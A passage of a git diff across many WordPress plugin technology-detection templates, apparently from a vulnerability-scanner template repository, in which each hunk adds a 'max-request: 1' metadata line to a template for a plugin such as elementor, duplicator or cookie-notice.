+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
